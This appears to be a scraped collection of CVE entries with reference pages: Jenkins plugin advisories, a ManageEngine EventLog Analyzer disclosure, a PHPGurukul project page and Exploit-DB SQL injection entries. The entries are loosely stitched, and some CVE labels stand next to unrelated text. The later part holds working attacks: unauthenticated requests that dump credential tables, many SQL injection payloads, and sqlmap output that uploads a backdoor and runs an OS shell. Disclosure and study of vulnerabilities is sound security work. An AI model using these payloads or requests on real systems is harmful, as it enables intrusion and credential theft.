Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Amazon EC2 Plugin
*   gitlab-hook Plugin
*   Health Advisor by CloudBees Plugin
*   Redgate SQL Change Automation Plugin
*   Robot Framework Plugin
*   Sounds Plugin

**Descriptions****CSRF vulnerability and missing permission checks in Amazon EC2 Plugin**

**SECURITY-1004 / CVE-2020-2090 (CSRF), CVE-2020-2091 (missing permission check)**  
**Severity (CVSS):** Low  
**Affected plugin: ec2**  
**Description:**

Amazon EC2 Plugin 1.47 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.

This vulnerability might also allow attackers to capture credentials stored in Jenkins. We have not been able to confirm that this is possible.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Amazon EC2 Plugin 1.48 requires POST requests and Overall/Administer permission for the affected form validation methods.

**XXE vulnerability in Robot Framework Plugin**

**SECURITY-1698 / CVE-2020-2092**  
**Severity (CVSS):** High  
**Affected plugin: robot**  
**Description:**

Robot Framework Plugin 2.0.0 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for the 'Publish Robot Framework' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

Robot Framework Plugin 2.0.1 disables external entity resolution for its XML parser.

**CSRF vulnerability and missing permission checks in Health Advisor by CloudBees Plugin**

**SECURITY-1708 / CVE-2020-2093 (CSRF), CVE-2020-2094 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-jenkins-advisor**  
**Description:**

Health Advisor by CloudBees Plugin 3.0 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to send an email with fixed content to an attacker-specified recipient.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Health Advisor by CloudBees Plugin 3.0.1 requires POST requests and Overall/Administer permission for the affected form validation methods.

**Redgate SQL Change Automation Plugin stored credentials in plain text**

**SECURITY-1696 / CVE-2020-2095**  
**Severity (CVSS):** Medium  
**Affected plugin: redgate-sql-ci**  
**Description:**

Redgate SQL Change Automation Plugin 2.0.4 and earlier stores a NuGet API key unencrypted in job config.xml files as part of its configuration. This credential could be viewed by users with Extended Read permission or access to the Jenkins controller file system.

Redgate SQL Change Automation Plugin 2.0.5 now stores the API key encrypted. Existing jobs need to have their configuration saved for existing plain text passwords to be overwritten.

**Reflected XSS vulnerability in gitlab-hook Plugin**

**SECURITY-1683 / CVE-2020-2096**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-hook**  
**Description:**

gitlab-hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint. This results in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Sounds Plugin allow OS command execution**

**SECURITY-814 / CVE-2020-2097 (permission check), CVE-2020-2098 (CSRF)**  
**Severity (CVSS):** High  
**Affected plugin: sounds**  
**Description:**

Sounds Plugin 0.5 and earlier does not perform permission checks in URLs performing form validation. This allows attackers with Overall/Read access to execute arbitrary OS commands as the OS user account running Jenkins.

Additionally, these form validation URLs do not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-814: High
*   SECURITY-1004: Low
*   SECURITY-1683: Medium
*   SECURITY-1696: Medium
*   SECURITY-1698: High
*   SECURITY-1708: Medium

**Affected Versions**

*   **Amazon EC2 Plugin** up to and including 1.47
*   **gitlab-hook Plugin** up to and including 1.4.2
*   **Health Advisor by CloudBees Plugin** up to and including 3.0
*   **Redgate SQL Change Automation Plugin** up to and including 2.0.4
*   **Robot Framework Plugin** up to and including 2.0.0
*   **Sounds Plugin** up to and including 0.5

**Fix**

*   **Amazon EC2 Plugin** should be updated to version 1.48
*   **Health Advisor by CloudBees Plugin** should be updated to version 3.0.1
*   **Redgate SQL Change Automation Plugin** should be updated to version 2.0.5
*   **Robot Framework Plugin** should be updated to version 2.0.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   gitlab-hook Plugin
*   Sounds Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Ai Ho (@j3ssiejjj)** for SECURITY-1683
*   **Federico Pellegrin** for SECURITY-1698
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1004
*   **Thomas de Grenier de Latour** for SECURITY-814
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1696

CVE-2020-2096: Jenkins Security Advisory 2020-01-15

A missing permission check in Jenkins Health Advisor by CloudBees Plugin 3.0 and earlier allows attackers with Overall/Read permission to send a fixed email to an attacker-specific recipient.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Amazon EC2 Plugin
*   gitlab-hook Plugin
*   Health Advisor by CloudBees Plugin
*   Redgate SQL Change Automation Plugin
*   Robot Framework Plugin
*   Sounds Plugin

**Descriptions****CSRF vulnerability and missing permission checks in Amazon EC2 Plugin**

**SECURITY-1004 / CVE-2020-2090 (CSRF), CVE-2020-2091 (missing permission check)**

Amazon EC2 Plugin 1.47 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.

This vulnerability might also allow attackers to capture credentials stored in Jenkins. We have not been able to confirm that this is possible.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Amazon EC2 Plugin 1.48 requires POST requests and Overall/Administer permission for the affected form validation methods.

**XXE vulnerability in Robot Framework Plugin**

**SECURITY-1698 / CVE-2020-2092**

Robot Framework Plugin 2.0.0 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for the 'Publish Robot Framework' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

Robot Framework Plugin 2.0.1 disables external entity resolution for its XML parser.

**CSRF vulnerability and missing permission checks in Health Advisor by CloudBees Plugin**

**SECURITY-1708 / CVE-2020-2093 (CSRF), CVE-2020-2094 (missing permission check)**

Health Advisor by CloudBees Plugin 3.0 and earlier does not perform permission checks in methods performing form validation. This allows users with Overall/Read access to send an email with fixed content to an attacker-specified recipient.

Additionally, these form validation methods do not require POST requests, resulting in a CSRF vulnerability.

Health Advisor by CloudBees Plugin 3.0.1 requires POST requests and Overall/Administer permission for the affected form validation methods.

**Redgate SQL Change Automation Plugin stored credentials in plain text**

**SECURITY-1696 / CVE-2020-2095**

Redgate SQL Change Automation Plugin 2.0.4 and earlier stores a NuGet API key unencrypted in job config.xml files as part of its configuration. This credential could be viewed by users with Extended Read permission or access to the Jenkins controller file system.

Redgate SQL Change Automation Plugin 2.0.5 now stores the API key encrypted. Existing jobs need to have their configuration saved for existing plain text passwords to be overwritten.

**Reflected XSS vulnerability in gitlab-hook Plugin**

**SECURITY-1683 / CVE-2020-2096**

gitlab-hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint. This results in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Sounds Plugin allow OS command execution**

**SECURITY-814 / CVE-2020-2097 (permission check), CVE-2020-2098 (CSRF)**

Sounds Plugin 0.5 and earlier does not perform permission checks in URLs performing form validation. This allows attackers with Overall/Read access to execute arbitrary OS commands as the OS user account running Jenkins.

Additionally, these form validation URLs do not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-814: High
*   SECURITY-1004: Low
*   SECURITY-1683: Medium
*   SECURITY-1696: Medium
*   SECURITY-1698: High
*   SECURITY-1708: Medium

**Affected Versions**

*   **Amazon EC2 Plugin** up to and including 1.47
*   **gitlab-hook Plugin** up to and including 1.4.2
*   **Health Advisor by CloudBees Plugin** up to and including 3.0
*   **Redgate SQL Change Automation Plugin** up to and including 2.0.4
*   **Robot Framework Plugin** up to and including 2.0.0
*   **Sounds Plugin** up to and including 0.5

**Fix**

*   **Amazon EC2 Plugin** should be updated to version 1.48
*   **Health Advisor by CloudBees Plugin** should be updated to version 3.0.1
*   **Redgate SQL Change Automation Plugin** should be updated to version 2.0.5
*   **Robot Framework Plugin** should be updated to version 2.0.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   gitlab-hook Plugin
*   Sounds Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Ai Ho (@j3ssiejjj)** for SECURITY-1683
*   **Federico Pellegrin** for SECURITY-1698
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1004
*   **Thomas de Grenier de Latour** for SECURITY-814
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1696

CVE-2020-2094: Jenkins Security Advisory 2020-01-15

A missing permission check in Jenkins Amazon EC2 Plugin 1.47 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.

CVE-2020-2091: Jenkins Security Advisory 2020-01-15

Zoho ManageEngine EventLog Analyzer versions 7 through 9.9 build 9002 have a database Information Disclosure Vulnerability. Fixed in EventLog Analyzer 10.0 Build 10000.

Hi,

This is the 6th part of the ManageOwnage series. For previous parts see [1].

This time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be  
abused to dump information from the database and obtain the superuser  
credentials for Windows and AS/400 hosts which are managed by EventLog  
Analyzer. A Metasploit module has also been released and should be  
integrated in the framework in the next few days [2].

I'm releasing these as a 0 day since it's been 70 days since I  
informed ManageEngine of this vulnerability and they have been  
twiddling their thumbs ever since. The last update I got was that they  
were "working on fixing it but couldn't commit to a date; the  
tentative date is end of the year".  
Since they have been vulnerable to a more serious remote code  
execution 0 day for 67 days now (see [3]), I'm not holding this any  
longer.

Details and timeline of disclosure are below, and a copy of this  
advisory can be found at my repo [4].

Regards,  
Pedro

>> Multiple vulnerabilities in ManageEngine EventLog Analyzer  
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security  
==========================================================================  
Disclosure: 05/11/2014 / Last updated: 05/11/2014

>> Background on the affected product:  
"EventLog Analyzer provides the most cost-effective Security  
Information and Event Management (SIEM) software on the market. Using  
this Log Analyzer software, organizations can automate the entire  
process of managing terabytes of machine generated logs by collecting,  
analyzing, correlating, searching, reporting, and archiving from one  
central location. This event log analyzer software helps to monitor  
file integrity, conduct log forensics analysis, monitor privileged  
users and comply to different compliance regulatory bodies by  
intelligently analyzing your logs and instantly generating a variety  
of reports like user activity reports, historical trend reports, and  
more."

A Metasploit exploit that abuses these two vulnerabilities to obtain  
the managed device superuser credentials has been released.

#1  
Vulnerability: SQL database information disclosure (read any table in  
the database)  
CVE-2014-6038  
Constraints: none; no authentication or any other information needed.  
On v7 the url has to be prepended with /event/.  
Affected versions: all versions from v7 to v9.9 build 9002.

GET /agentHandler?mode=getTableData&table=[tableName]  
GET /agentHandler?mode=getTableData&table=AaaUser --> user logins  
GET /agentHandler?mode=getTableData&table=AaaPassword --> user  
passwords (MD5 hashed) and salts  
GET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user  
password hints  
GET /agentHandler?mode=getTableData&table=HostDetails --> Windows /  
AS/400 managed hosts Administrator usernames and passwords (XOR'ed  
with 0x30)

#2  
Vulnerability: Windows / AS/400 managed hosts Administrator  
credentials disclosure  
CVE-2014-6039  
Constraints: none; no authentication or any other information needed.  
On v7 the url has to be prepended with /event/.  
Affected versions: all versions from v7 to v9.9 build 9002.

GET /hostdetails?slid=X&hostid=Y  
GET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser  
username and password (XOR'ed with 0x30 and base64 encoded)

>> Fix:  
UNFIXED - ManageEngine failed to take action after 70 days.

Timeline of disclosure:  
28/08/2014  
- Requested contact to email via ManageEngine Security Response Center  
- Received email from support and sent details about the  
vulnerabilities above and a third vulnerability (remote code execution  
via file upload).

28/08/2014  
- ManageEngine acknowledge the receipt and promise to keep me informed  
of the progress.

31/08/2014  
- hong10 releases details about the remote code execution via file  
upload vulnerability which I had discovered. Apparently he discovered  
and communicated it to ManageEngine over a year ago and no action had  
been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).  
- I ask ManageEngine why I hadn't been informed that one of my  
vulnerabilities had already been disclosed to them over a year ago.  
They respond with "We appreciate your efforts and will fix your  
vulnerabilities, please bear with us".  
- With hong10's support, I release an exploit for the remote code  
execution vulnerability (see  
http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the  
vulnerability information from this report since it has already been  
discovered and disclosed by hong10.

11/09/2014  
- Asked for an update on progress. Received a response a day after  
"the development team will include the fix in our next release".

13/10/2014  
- Asked for an update on progress. No response.

17/10/2014  
- Informed ManageEngine that will release details and an exploit the  
next day if no reply is received.

19/10/2014  
- Attempted escalation via the project manager for Desktop Central.  
EventLog support team replies on the next day apologising for not  
responding and saying will get back to me as soon as possible.

05/11/2014  
- Informed EventLog support that would release details and exploit  
today. Received reply stating "we are working on this but cannot  
commit to a date; the new version has a tentative release date of end  
of quarter".  
- Released advisory and exploit 70 days after initial contact  
(interesting fact: it's been 67 days since the release of my exploit  
for hong10's vulnerability and EventLog Analyzer is still vulnerable  
to remote code execution).

[1]  
http://seclists.org/fulldisclosure/2014/Aug/55  
http://seclists.org/fulldisclosure/2014/Aug/75  
http://seclists.org/fulldisclosure/2014/Aug/88  
http://seclists.org/fulldisclosure/2014/Sep/1  
http://seclists.org/fulldisclosure/2014/Sep/110

[2]  
https://github.com/rapid7/metasploit-framework/pull/4137

[3]  
http://seclists.org/fulldisclosure/2014/Aug/88

[4]  
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt

CVE-2014-6038: ManageEngine EventLog Analyzer SQL / Credential Disclosure ≈ Packet Storm

An issue was discovered in ManageEngine Applications Manager 14 with Build 14360. Integrated PostgreSQL which is built-in in Applications Manager is prone to attack due to lack of file permission security. The malicious users who are in “Authenticated Users” group can exploit privilege escalation and modify PostgreSQL configuration to execute arbitrary command to escalate and gain full system privilege user access and rights over the system.

**Privilege escalation exploit on PostgreSQL insecure file permission**  

Vulnerability Details

Impact

**CVSS V3 rating: 8.8 HIGH**

Fixed

24 November 2019

Affected Builds

Till Build 14420

Fixed in

Build 14430

Overview

Privilege escalation exploit on PostgreSQL insecure file permission.

**Recommended Fix**

**Upgrade Applications Manager to version 14430 or above.**

  
**Description- Security Update - CVE-2019-19475 Database**

An issue was discovered in ManageEngine Applications Manager 14 with Build 14360. Integrated PostgreSQL which is built-in in Applications Manager is prone to attack due to lack of file permission security. The malicious users who are in "Authenticated Users" group can exploit privilege escalation and modify PostgreSQL configuration to execute arbitrary command to escalate and gain full system privilege user access and rights over the system.

We recommend you to upgrade Applications Manager to version 14430 to fix this issue.

  

**Source and Acknowledgements**

Find out more about CVE-2019-19475 from CVE Directory and NIST NVD.

**Reported by:**  
Sittikorn Sangrattanapitak - Cybersecurity Researcher.  
Nuttakorn Tungpoonsup - Secure D Center Research Team, Secure D Center Co.,Ltd.  
Ammarit Thongthua - Secure D Center Research Team, Secure D Center Co.,Ltd.

**Need Help?**

For clarification or corrections please contact our support team or email us at appmanager-support@manageengine.com

CVE-2019-19475: Security Updates - CVE Details - CVE-2019-19475

Déjà Vu Crescendo Sales CRM has remote SQL Injection

Privacy Statement Terms & Conditions Cookie Policy Accessibility Statement Do Not Sell My Personal Information (for CA)

© 2021 Accenture. All Rights Reserved.

CVE-2014-4984: Bugtraq

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to XSS, as demonstrated by the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName parameter in add-product.php.

**Dairy Farm Shop Management System Using PHP and MySQL**

  

**Project Name**               :  Dairy Farm Shop Management System Project (DFSMS)

**Language Used                   :**  PHP

**Database                              :**  MySQL

**User Interface Design       :**  HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser                       :**  Mozilla, Google Chrome, IE8, OPERA

**Software                               :**  XAMPP / Wamp / Mamp/ Lamp (anyone)

DFSMS is a web-based application which manages the products of dairy shop. It has one module i.e. admin who manages all the functions of the dairy shop.

**Admin Features :**

**Dashboard:** In this section, admin can see all detail in brief like Total listed categories, companies, products and also see the sales.

**Category:** In this section, admin can add new categories and edit, delete old categories.

**Company:** In this section, admin can add new companies and edit, delete old companies.

**Product:** In this section, admin can add new products and edit old products.

**Search:** In this section, admin can search for a product then add the product into the cart and generate invoice /receipt.

**Invoices:** In this section, admin can view all generated invoices/receipts.

**Reports**: In this section, admin can generate two reports, one is B/w date and another one is for sales.

Admin can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Login Page**

**Login Page**

**Admin Dashboard**

**Admin Dashboard**

**Add Product Page**

**Add Product Page**

**Invoice Page**

**Invoice**

**How to run the Dairy Farm Shop Management System Project (DFSMS)**

1\. Download the zip file

2\. Extract the file and copy dfsms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4\. Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with name dfsms

6\. Import dfsms.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/dfsms

**Admin Credential**

**Username:** admin  
**Password:** Test@123

**View Demo——————————————**

Download Full Source Code (DFSMS)

Size: 9.84 MB

Version: V 1.1

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-5308: Dairy Farm Shop Management System Project, Dairy Farm Shop Management System in Php

PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file.

**Hostel Management System 2.0 - 'id' SQL Injection**

**Platform:****PHP**

**Date:****2020-01-06**

  

    # Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
    # Google Dork: intitle: "Hostel management system"
    # Date: 2020-01-03
    # Exploit Author: FULLSHADE
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/hostel-management-system/
    # Version: v2.0
    # Tested on: Windows
    # CVE : N/A
    
    Description:
    
    The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
    SQL injection via the 'id' parameter on the full-profile.php page.
    
    ==================== 1. SQLi ====================
    
    http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
    
    THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
    user has the full ability to run system commands via --os-shell and fully compromise the system
    
    GET parameter 'id' is vulnerable.
    
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-3444' OR 1650=1650#
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=1' OR SLEEP(5)-- slKU
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 29 columns
        Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    
    [14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
    [14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
    [14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a] y
    command standard output: 'john-pc\john'
    os-shell>

CVE-2020-5510: OffSec’s Exploit Database Archive

There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability).

CVE-2019-20361

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
    # Google Dork: N/A
    # Date: 2020-01-03
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    # CVE: N/A
    
    # The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
    # SQL injection in multiple areas. The most severe of these is the username 
    # parameter on the login page as this injection can be done unauthenticated.
    
    
    ================================ 'username' - SQLi ================================
    
    POST /dfsms/index.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    username=test&password=test&login=
    
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'category' & 'categorycode' - SQLi ================================
    
    POST /dfsms/add-category.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/add-category.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    category=test&categorycode=test&submit=
    
    ---
    Parameter: category (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    ---
    Parameter: categorycode (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'companyname' - SQLi ================================
    
    ---
    Parameter: companyname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'productname' & 'productprice' - SQLi ================================
    
    ---
    Parameter: productname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
    ---
    ---
    Parameter: productprice (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'fromdate' & 'todate' - SQLi ================================
    
    ---
    Parameter: todate (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 5 columns
        Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
    
    Parameter: fromdate (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
    ---
    
    
    
    ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
    
    ---
    Parameter: emailid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: adminname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: mobilenumber (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
    ---

Tag

#sql